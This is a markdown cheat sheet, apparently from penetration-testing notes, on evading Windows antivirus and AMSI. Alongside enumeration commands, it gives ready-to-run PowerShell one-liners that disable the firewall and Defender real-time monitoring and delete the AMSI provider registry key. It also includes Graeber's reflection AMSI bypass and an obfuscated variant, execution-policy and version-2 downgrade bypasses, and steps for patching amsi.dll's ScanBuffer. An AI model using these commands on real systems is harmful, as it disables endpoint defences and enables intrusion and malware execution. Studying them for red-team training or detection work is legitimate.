# Antivirus Evasion * Existing types * On-Disk evasion * In-Memory evasion * Detection Methods * Static Detection -- Hash or String/Byte Matching * Dynamic -- predefined rules, run inside a sandbox, querying API and syscalls at runtime * Heuristic / Behaviourial Detection -- threshold hits by either static comparison of decompiled code or dynamically analyzed software * Additional Features * Unpacker -- decrypting and decompress * PE header parser -- portable executable headers are parsed * Emulation -- analysis in an emulated env ## Enumeration ```sh wmic /namespace:\\root\securitycenter2 path antivirusproduct Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct ``` ```sh Get-Service WinDefend Get-MpComputerStatus | select RealTimeProtectionEnabled ``` * Check firewall ```sh Get-NetFirewallProfile | Format-Table Name, Enabled ``` ```sh Get-NetFirewallRule | select DisplayName, Enabled, Description ``` * Check inbound port availability ```sh Test-NetConnection -ComputerName 127.0.0.1 -Port 80 ``` * Check Windows Defender and its active rules ```sh powershell -c "Get-MpPreference" powershell -c "Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Id ``` * Check tamper protection, and [bypass](https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d#file-doh-ps1) ```sh reg query "HKLM\Software\Microsoft\Windows Defender\Features" /v TamperProtection ``` ## Reset Options ```sh Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False ``` ## Anti Malware Secure Interface * Powershell .NET runtime detection measure of windows. Scans code before executed. * https://docs.microsoft.com/en-us/windows/win32/amsi/ * https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions * https://docs.microsoft.com/en-us/windows/win32/api/amsi/nn-amsi-iamsistream * Integrated inside components * User Account Control (UAC) * Powershell * Windows Script Host (wscript, csrcipt) * JavaScript and VBScript * VBA macros * `System.Management.Automation.dll` * Flow ``` | Win32 API | COM API | AV Provider | Interpreter --> AMSIScanBuffer --> AMSIScanString --> IAntiMalware::Scan() --> IAntiMalwareProvider::Scan() ``` ### Return Result/Response Codes ``` AMSI_RESULT_CLEAN = 0 AMSI_RESULT_NOT_DETECTED = 1 AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384 AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479 AMSI_RESULT_DETECTED = 32768 ``` ## PowerShell Policy Bypass ```sh powershell -ExecutionPolicy Bypass ``` or just the following line ```sh powershell -ep bypass ``` ### PowerShell Downgrade Attack * Downgrade Powershell version to 2.0, where no AMSI is implemented ```sh PowerShell -Version 2 ``` * [Unicorn](https://github.com/trustedsec/unicorn) does leverage this ### Reflection Bypass * Varying string concatenation and camelCasing variations of the following string by Matt Graeber * [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/) ```sh [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` or an obfuscated version ```sh [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse Set-MpPreference -DisableRealtimeMonitoring $true ``` ### AMSI ScanBuffer patch * Patching `amsi.dll`, which is loaded at Powershell startup * AMSI ScanBuffer is delivered to `amsi.dll` * Get handle of `amsi.dll` * Get process address of AmsiScanBuffer * Modify mem protection of AmsiScanBuffer * Write opcode to AMSIScanBuffer * [BC-Security's AMSI bypass](https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py) * [RastaMouse's AMSI bypass](https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs) ### Other Bypasses and Tools * [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git) * [amsifail](http://amsi.fail/) generates obfuscated snippets ### Validate * [AMSITrigger](https://github.com/RythmStick/AMSITrigger) identifies strings which trigger the AMSI functions * Validate Obfuscation and check which strings trigger AMSI * [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger) ```sh .\\AMSITrigger.exe -u -f 1 ``` or ```sh .\\AMSITrigger.exe -i -f 1 ``` ### Further Obfuscation * String concatenation ```sh $OBF = 'Ob' + 'fu' + 's' +'cation' ``` * `Concatenate - ('co'+'ffe'+'e')` * `Reorder - ('{1}{0}'-f'ffee','co')` * `Whitespace - ( 'co' +'fee' + 'e')` #### Type Obfuscation * .NET has type accelerators as aliases for types to shorten them and break the signature. * [idera](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/adding-new-type-accelerators-in-powershell) * [0x00-0x00](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html) * [Documentation at microsoft](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_type_accelerators?view=powershell-7.1) * Example * Without ```sh [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6); ``` * With ```sh [dorkstork]::copy($buf, 0, $BufferAddress, 6); ``` ### Automated Obfuscation #### Powershell * [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) * [Daniel's guide to Invoke-Obfuscation](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide) ```sh Invoke-Obfuscation -ScriptBlock {'Payload Here'} -Command 'Token\\String\\1,2,\\Whitespace\\1' -Quiet -NoExit ``` * [__8191 character limit__](https://docs.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/command-line-string-limitation) of command prompt must not be exceeded. #### Other Obfuscation * Pinpoint bytes that will be flagged with [ThreadCheck](https://github.com/rasta-mouse/ThreatCheck) * Has to be build via VS. Will output a ddll, an excutable and an XML file. * `ThreatCheck.exe -f ` * [DefenderCheck](https://github.com/matterpreter/DefenderCheck) ## Links * [cmnatic](https://cmnatic.co.uk/) * [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/) * [s3cur3th1ssh1t](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/) * [amsi.fail](https://amsi.fail/)